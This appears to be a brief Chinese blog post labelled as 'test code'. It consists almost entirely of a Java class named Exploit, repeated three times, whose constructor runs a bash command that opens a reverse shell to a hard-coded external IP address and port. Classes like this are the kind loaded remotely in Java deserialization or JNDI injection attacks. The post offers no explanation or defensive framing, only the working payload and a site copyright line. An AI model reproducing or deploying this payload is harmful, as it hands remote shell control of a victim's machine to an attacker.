测试哦~~~~~~~~~

测试代码
public class Exploit {
public Exploit(){
try {
Runtime.getRuntime().exec("bash -i 5<>/dev/tcp/118.24.28.219/8989 0>&5 1>&5");
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
public class Exploit {
public Exploit(){
try {
Runtime.getRuntime().exec("bash -i 5<>/dev/tcp/118.24.28.219/8989 0>&5 1>&5");
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}

public class Exploit { public Exploit(){ try { Runtime.getRuntime().exec("bash -i 5<>/dev/tcp/118.24.28.219/8989 0>&5 1>&5"); } catch(Exception e){ e.printStackTrace(); } } public static void main(String[] argv){ Exploit e = new Exploit(); } }

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zgzjdx.html